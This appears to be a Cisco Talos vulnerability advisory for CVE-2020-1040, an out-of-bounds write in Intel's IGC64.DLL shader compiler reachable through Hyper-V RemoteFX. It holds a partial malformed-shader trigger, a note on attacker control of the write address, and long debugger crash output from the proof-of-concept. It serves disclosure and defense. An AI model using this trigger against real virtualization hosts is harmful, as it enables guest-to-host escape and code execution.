Microsoft Hyper-V/RemoteFX: CVE-2020-1040
An exploitable memory corruption vulnerability exists in Intel’s IGC64.DLL graphics driver, version 26.20.100.7584. A specially crafted vertex shader can cause an out-of-bounds write, which could lead to arbitrary code execution. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability could potentially be triggered from guest machines running on virtualization environments (e.g. VMware, QEMU, VirtualBox etc.) in order to perform guest-to-host escape - as it was demonstrated before in TALOS-2018-0533, TALOS-2018-0568, etc. Theoretically, this vulnerability could be also triggered from a web browser (using WebGL and WebAssembly) but Talos has not been able to confirm this.
Intel IGC64.DLL (Intel Graphics Shader Compiler for Intel(R) Graphics Accelerator), version 26.20.100.7584
Microsoft Hyper-V with RemoteFX enabled (CVE-2020-1040)
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787: Out-of-bounds Write
This vulnerability can be triggered by supplying a malformed vertex shader, leading to an out-of-bounds write in the Intel IGC64 driver (this driver is mapped by the affected component, e.g. VMware’s vmware-vmx.exe).
Example of compute shader triggering the bug:
cs_5_0
00000000: 0x000002f8 - 0x000002fc 6a 08 00 01 dcl_global_flags refactoringAllowed
00000001: 0x000002fc - 0x0000030c 59 00 00 04 46 8e 20 00 00 00 00 00 01 00 00 00 dcl_constant_buffer cb0[1].xyzw, immediateIndexed
00000002: 0x0000030c - 0x0000031c 58 18 00 04 00 70 10 00 00 00 00 00 44 44 00 00 dcl_resource_texture2d resource[0]
...
00000007: 0x0000035c - 0x00000364 5f 00 00 02 32 10 02 00 dcl_input vThreadGrouID.xy
00000008: 0x00000364 - 0x0000036c 5f 00 00 02 32 00 02 00 dcl_input vThreadID.xy
00000009: 0x0000036c - 0x00000374 68 00 00 02 04 00 00 00 dcl_temps 4
00000010: 0x00000374 - 0x00000384 69 00 00 04 00 00 c6 f4 83 00 00 00 04 00 00 00 dcl_indexable_temp x4106616832[131], 4
DCL_INDEXABLETEMP instruction declares an indexable, temporary register. By malforming this instruction, an attacker is able to cause an arbitrary memory write.
Important fact is that the attacker can control the RDI register (used as index for destination memory address calculation) since this value is taken directly from the shader. This allows an attacker to control the destination address for an arbitrary memory write.
0:006> r
rax=000002123b089e90 rbx=0000000000000083 rcx=0000021239050000
rdx=0000021239050000 rsi=0000000000000004 rdi=00000000f4c60000
rip=00007ffc713762eb rsp=0000005b556fe510 rbp=0000005b556fe610
r8=000002123b08a201 r9=000002123b082090 r10=0000000000000003
r11=0000005b556fe430 r12=0000000000000000 r13=000002123b083fc0
r14=0000000000000004 r15=0000000000000069
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
igc64!OpenCompiler12+0x6eb5b:
00007ffc`713762eb 891cb8 mov dword ptr [rax+rdi*4],ebx ds:00000216`0e209e90=????????
Stack trace:
0:006> kb
# RetAddr : Args to Child : Call Site
00 00007ffc`71335b2d : 00000000`00000001 0000005b`556fe770 00000000`00002000 00000000`04000069 : igc64!OpenCompiler12+0x6eb5b
01 00007ffc`713344f2 : 00000000`00000002 00000212`3b07a094 00000212`3b07a0a4 0000005b`556ff200 : igc64!OpenCompiler12+0x2e39d
02 00007ffc`713341a3 : 00000000`00000000 00000212`3b083fc0 00000000`00000002 00000000`00000000 : igc64!OpenCompiler12+0x2cd62
03 00007ffc`7133406f : 00000212`3b07a010 00000212`3b07a010 00000212`3b07a010 00000212`3b082090 : igc64!OpenCompiler12+0x2ca13
04 00007ffc`7130a23e : 00000212`3b077b00 0000005b`556ff370 00000212`3b082090 00000212`3b082090 : igc64!OpenCompiler12+0x2c8df
05 00007ffc`7130cb02 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : igc64!OpenCompiler12+0x2aae
06 00007ffc`748f7299 : 00000000`00000000 00000000`00000010 00000000`00000000 00000000`40000068 : igc64!OpenCompiler12+0x5372
07 00007ffc`749ed34f : 00000000`00000010 00000000`00000020 00000000`00000000 0000005b`556ff9f0 : igd10iumd64!OpenAdapter10_2+0x2fc79
08 00007ffc`748f5187 : 00000212`3b077d58 00000212`3b05b1a0 00000000`00000000 00000212`3b05a9a0 : igd10iumd64!OpenAdapter10_2+0x125d2f
09 00007ffc`75028d50 : 00000000`00000000 00000000`00000000 00000212`3b077d90 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x2db67
0a 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x761730
0b 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0c 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
:006> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for POC_EXEC11.exe
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : Analysis.CPU.Sec
Value: 0
Key : Analysis.Elapsed.Sec
Value: 61
Key : Analysis.Memory.CommitPeak.Mb
Value: 68
Key : Timeline.OS.Boot.DeltaSec
Value: 128651
Key : Timeline.Process.Start.DeltaSec
Value: 213
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2020-01-12T15:14:18.526Z
Diff: 526 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2020-01-12T15:14:18.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2020-01-12T15:10:45.0Z
Diff: 213000 mSec
Timeline: OS.Boot
Name: <blank>
Time: 2020-01-11T03:30:07.0Z
Diff: 128651000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
MODLIST_WITH_TSCHKSUM_HASH: 55cdb3bc7aae3aedb1ba047e3d2dba6243aad2f9
MODLIST_SHA1_HASH: 6ce0e83b6da7c6a553d1e322f42f958f3d7a27e9
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
FAULTING_IP:
igc64!OpenCompiler12+6eb5b
00007ffc`713762eb 891cb8 mov dword ptr [rax+rdi*4],ebx
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffc713762eb (igc64!OpenCompiler12+0x000000000006eb5b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000002160e209e90
Attempt to write to address 000002160e209e90
FAULTING_THREAD: 00000ab4
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: POC_EXEC11.exe
FOLLOWUP_IP:
igc64!OpenCompiler12+6eb5b
00007ffc`713762eb 891cb8 mov dword ptr [rax+rdi*4],ebx
WRITE_ADDRESS: 000002160e209e90
ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si do pami ci pod adresem 0x%p. Pami nie mo e by %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si do pami ci pod adresem 0x%p. Pami nie mo e by %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 000002160e209e90
WATSON_BKT_PROCSTAMP: 5e1b04b9
WATSON_BKT_MODULE: igc64.dll
WATSON_BKT_MODSTAMP: 5ddcfccd
WATSON_BKT_MODOFFSET: ab62eb
WATSON_BKT_MODVER: 26.20.100.7584
MODULE_VER_PRODUCT: Intel HD Graphics Drivers for Windows(R)
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_HOST: IAMLEGION
ANALYSIS_SESSION_TIME: 01-12-2020 16:14:18.0526
ANALYSIS_VERSION: 10.0.18914.1001 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: PLK
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0xab4]
Frame: [0] : igc64!OpenCompiler12
ID: [0n286]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0xab4]
Frame: [0] : igc64!OpenCompiler12
LAST_CONTROL_TRANSFER: from 00007ffc71335b2d to 00007ffc713762eb
STACK_TEXT:
0000005b`556fe510 00007ffc`71335b2d : 00000000`00000001 0000005b`556fe770 00000000`00002000 00000000`04000069 : igc64!OpenCompiler12+0x6eb5b
0000005b`556fe670 00007ffc`713344f2 : 00000000`00000002 00000212`3b07a094 00000212`3b07a0a4 0000005b`556ff200 : igc64!OpenCompiler12+0x2e39d
0000005b`556ff0a0 00007ffc`713341a3 : 00000000`00000000 00000212`3b083fc0 00000000`00000002 00000000`00000000 : igc64!OpenCompiler12+0x2cd62
0000005b`556ff0e0 00007ffc`7133406f : 00000212`3b07a010 00000212`3b07a010 00000212`3b07a010 00000212`3b082090 : igc64!OpenCompiler12+0x2ca13
0000005b`556ff1e0 00007ffc`7130a23e : 00000212`3b077b00 0000005b`556ff370 00000212`3b082090 00000212`3b082090 : igc64!OpenCompiler12+0x2c8df
0000005b`556ff270 00007ffc`7130cb02 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : igc64!OpenCompiler12+0x2aae
0000005b`556ff870 00007ffc`748f7299 : 00000000`00000000 00000000`00000010 00000000`00000000 00000000`40000068 : igc64!OpenCompiler12+0x5372
0000005b`556ff8a0 00007ffc`749ed34f : 00000000`00000010 00000000`00000020 00000000`00000000 0000005b`556ff9f0 : igd10iumd64!OpenAdapter10_2+0x2fc79
0000005b`556ff8f0 00007ffc`748f5187 : 00000212`3b077d58 00000212`3b05b1a0 00000000`00000000 00000212`3b05a9a0 : igd10iumd64!OpenAdapter10_2+0x125d2f
0000005b`556ffaf0 00007ffc`75028d50 : 00000000`00000000 00000000`00000000 00000212`3b077d90 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x2db67
0000005b`556ffb60 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x761730
0000005b`556ffb90 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0000005b`556ffbc0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
STACK_COMMAND: ~6s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: 5864a9a245aa9d7d72dd761f45b4ecad1094c55a
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 1dde1ebb049458f27fe5decc4c746621e995ae5d
THREAD_SHA1_HASH_MOD: d3c4318038da893d2045ecf22932c2d470c55d2e
FAULT_INSTR_CODE: 49b81c89
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: igc64!OpenCompiler12+6eb5b
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: igc64
IMAGE_NAME: igc64.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5ddcfccd
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_igc64.dll!OpenCompiler12
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_igc64!OpenCompiler12+6eb5b
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: igc64.dll
BUCKET_ID_IMAGE_STR: igc64.dll
FAILURE_MODULE_NAME: igc64
BUCKET_ID_MODULE_STR: igc64
FAILURE_FUNCTION_NAME: OpenCompiler12
BUCKET_ID_FUNCTION_STR: OpenCompiler12
BUCKET_ID_OFFSET: 6eb5b
BUCKET_ID_MODTIMEDATESTAMP: 5ddcfccd
BUCKET_ID_MODCHECKSUM: 2450ddb
BUCKET_ID_MODVER_STR: 0.0.0.0
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: igc64.dll!OpenCompiler12
TARGET_TIME: 2020-01-12T15:15:19.000Z
OSBUILD: 18362
OSSERVICEPACK: 329
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: ee9e
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_igc64.dll!opencompiler12
FAILURE_ID_HASH: {1c89f3a6-178c-7483-67bb-857d785cefd5}
Followup: MachineOwner
---------
Discovered by Piotr Bania of Cisco Talos.
http://talosintelligence.com/vulnerability-reports/
2020-01-27 - Vendor Disclosure
2020-04-01 - Disclosure deadline extended
2020-07-14 - Public Release
Discovered by Piotr Bania of Cisco Talos.